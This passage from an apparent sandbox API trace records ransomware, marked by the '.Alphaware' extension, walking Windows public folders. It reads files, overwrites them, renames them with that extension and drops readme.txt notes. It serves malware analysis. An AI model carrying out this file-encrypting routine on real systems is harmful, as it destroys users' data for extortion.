ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8ecf8380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1136c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desert.jpg.Alphaware", cAlternateFileName="")) returned 1 [0102.692] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8ed44640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x6b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="")) returned 1 [0102.692] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8ee4efe0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xc1d48, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hydrangeas.jpg.Alphaware", cAlternateFileName="HYDRAN~1.ALP")) returned 1 [0102.692] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8ef33820, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xfc8f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jellyfish.jpg.Alphaware", cAlternateFileName="JELLYF~1.ALP")) returned 1 [0102.692] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8f018060, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xfe3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Koala.jpg.Alphaware", cAlternateFileName="")) returned 1 [0102.692] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8f2c5920, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xb6c20, dwReserved0=0x0, dwReserved1=0x0, cFileName="Lighthouse.jpg.Alphaware", cAlternateFileName="LIGHTH~1.ALP")) returned 1 [0102.692] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8f41c580, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xfd408, dwReserved0=0x0, dwReserved1=0x0, cFileName="Penguins.jpg.Alphaware", cAlternateFileName="")) returned 1 [0102.692] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8eba1720, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8eba1720, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8eba1720, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0102.692] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8f657a20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xca2a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tulips.jpg.Alphaware", cAlternateFileName="")) returned 1 [0102.692] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8f657a20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xca2a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tulips.jpg.Alphaware", cAlternateFileName="")) returned 0 [0102.693] FindClose (in: hFindFile=0xd8a4f0 | out: hFindFile=0xd8a4f0) returned 1 [0102.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0102.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0102.693] CoTaskMemAlloc (cb=0x20c) returned 0xd85a10 [0102.694] SHGetFolderPathW (in: hwnd=0x0, csidl=53, hToken=0x0, dwFlags=0x0, pszPath=0xd85a10 | out: pszPath="C:\\Users\\Public\\Music") returned 0x0 [0102.696] CoTaskMemFree (pv=0xd85a10) [0102.696] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music", nBufferLength=0x105, lpBuffer=0x23e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music", lpFilePart=0x0) returned 0x15 [0102.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0102.696] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music", nBufferLength=0x105, lpBuffer=0x23e6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music", lpFilePart=0x0) returned 0x15 [0102.697] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*" (normalized: "c:\\users\\public\\music\\*"), lpFindFileData=0x23e9e0 | out: lpFindFileData=0x23e9e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a610 [0102.699] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.699] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0102.699] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 1 [0102.699] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 0 [0102.699] FindClose (in: hFindFile=0xd8a610 | out: hFindFile=0xd8a610) returned 1 [0102.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0102.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0102.714] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\desktop.ini", dwFileAttributes=0x80) returned 1 [0102.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0102.715] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23c8e08 | out: lpFileInformation=0x23c8e08*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c)) returned 1 [0102.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0102.715] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\desktop.ini", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\desktop.ini", lpFilePart=0x0) returned 0x21 [0102.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0102.716] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0102.716] GetFileType (hFile=0x264) returned 0x1 [0102.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0102.716] GetFileSize (in: hFile=0x264, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x17c [0102.716] ReadFile (in: hFile=0x264, lpBuffer=0x23c91a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x23c91a8*, lpNumberOfBytesRead=0x23eb38*=0x17c, lpOverlapped=0x0) returned 1 [0102.780] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Music\\desktop.ini", nBufferLength=0x105, lpBuffer=0x23e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Music\\desktop.ini", lpFilePart=0x0) returned 0x21 [0102.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0102.780] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0102.781] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0102.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0102.783] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8f73c260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2c8)) returned 1 [0102.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0102.783] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Music\\desktop.ini.Alphaware" (normalized: "c:\\users\\public\\music\\desktop.ini.alphaware")) returned 1 [0102.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0102.785] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\readme.txt" (normalized: "c:\\users\\public\\music\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0102.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0102.788] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0102.788] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8f73c260, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8f73c260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.789] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8f73c260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="")) returned 1 [0102.789] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f73c260, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8f73c260, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8f73c260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0102.789] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 1 [0102.789] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0102.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0102.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0102.792] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8031a7b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.793] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0102.793] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be5ebf7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8064f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kalimba.mp3", cAlternateFileName="")) returned 1 [0102.793] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be5ebf7, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3ec5d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maid with the Flaxen Hair.mp3", cAlternateFileName="MAIDWI~1.MP3")) returned 1 [0102.793] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be38a97, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be38a97, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x49e459, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sleep Away.mp3", cAlternateFileName="SLEEPA~1.MP3")) returned 1 [0102.793] FindNextFileW (in: hFindFile=0xd8a610, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0102.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0102.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0102.794] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\desktop.ini", dwFileAttributes=0x80) returned 1 [0102.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0102.796] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x244def0 | out: lpFileInformation=0x244def0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x24a)) returned 1 [0102.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0102.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0102.797] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0102.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0102.797] ReadFile (in: hFile=0x264, lpBuffer=0x244e390, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x244e390*, lpNumberOfBytesRead=0x23ea98*=0x24a, lpOverlapped=0x0) returned 1 [0102.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0102.823] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0102.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0102.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0102.825] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8f7ae680, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e0)) returned 1 [0102.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0102.825] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Music\\Sample Music\\desktop.ini.Alphaware" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini.alphaware")) returned 1 [0102.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0102.826] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\readme.txt" (normalized: "c:\\users\\public\\music\\sample music\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0102.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0102.828] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3", dwFileAttributes=0x80) returned 1 [0102.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0102.828] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), fInfoLevelId=0x0, lpFileInformation=0x24d19f0 | out: lpFileInformation=0x24d19f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be5ebf7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x8064f1)) returned 1 [0102.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0103.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0103.090] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0103.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0103.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0103.293] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ec40 | out: lpFileInformation=0x23ec40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be5ebf7, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8fc24fc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4d5ab5)) returned 1 [0103.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8c8) returned 1 [0103.293] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), lpNewFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.Alphaware" (normalized: 